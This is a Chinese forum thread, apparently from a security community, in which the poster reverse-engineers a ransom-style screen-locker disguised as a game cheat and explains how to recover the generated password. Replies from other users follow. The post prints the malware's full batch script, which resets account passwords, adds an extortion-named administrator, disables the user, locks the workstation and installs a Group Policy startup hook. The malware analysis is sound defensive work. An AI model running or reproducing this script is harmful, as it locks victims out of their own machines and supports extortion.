记一次破解简单的锁机恶意程序
本帖最后由 911061873 于 2018-2-21 20:40 编辑关键字:英魂之刃全图辅助_内部定制版
前两天有个小弟来求助,说电脑被锁了,并且发来了一个锁电脑的程序。
在虚拟机中测试了下如图。
恢复以前的快照,开始对程序动手
用OD载入,查字符串。
像这种锁机程序一般都是用CMD命令对系统帐户进行操作,果然在字符串里面找到了一个“cmd.exe /c”。
跟进去,然后F2下断点,F9运行起来,程序停到断点的地方了。
F7单步运行一下,发现有一个文件路径入栈,是临时目录里面的一个批处理文件。
打开临时目录,设置系统隐藏文件可见,就看到了这个批处理。
查看批处理的内容
@shift
set opw=lzj_
set rnum=%random%
set npw=%opw%%rnum:~-2%%rnum:~-3%
net user administrator %npw% &
net user Administrator %npw% &
net user %username% %npw% &
net user 要密码加QQ360665490 %npw% /add &
net useraeon%rnum% %npw% /add &
net localgroup administrators 要密码加QQ360665490 /add &
net localgroup administrators aeon%rnum% /add &
net user %username% /active:no &
net user 要密码加QQ360665490 /active:yes &
net user aeon%rnum% /active:yes &
rundll32.exe user32.dll,LockWorkStation &
copy %0 C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup /y&&
echo >C:\Windows\System32\GroupPolicy\Machine\Scripts\scripts.ini&&
echo 0CmdLine=%~nx0>>C:\Windows\System32\GroupPolicy\Machine\Scripts\scripts.ini &&
echo 0Parameters=>>C:\Windows\System32\GroupPolicy\Machine\Scripts\scripts.ini
到这里,帐户名和密码就已经知道了。
密码是“lzj_”加上有一个前缀为“aeon”的帐户后面五位随机数的后两位和后三位。
例如随机数是“12345”,则密码为“lzj_45345”
所以密码应该是 lzj_52952吗?{:1_904:} WGT 发表于 2018-2-21 22:18
net useraeon%rnum% %npw% /add & 他这里这么写是什么效果?
set opw=lzj_
set rnum=%random%#rnum等于随机数
set npw=%opw%%rnum:~-2%%rnum:~-3%#npm等于变量opw加上随机数的后两位再加上随机数后三位
net user aeon%rnum% %npw% /add &#这句话就是添加了一个用户名为“aeon加随机数”的用户。
锁机程序在这里
哇楼主棒棒哒,我是最近开始学习OD的,这样的帖子对我来说像营养快线{:1_918:}多谢楼主了{:1_893:} 还有这种骚套路~~膜拜膜拜 居然还有这么下流的作者。 哦,一个系统密码 谢谢楼主分享 感谢楼主分享! 这肯定小学生弄的 你怎么知道是临时目录,没讲清楚,教程白搭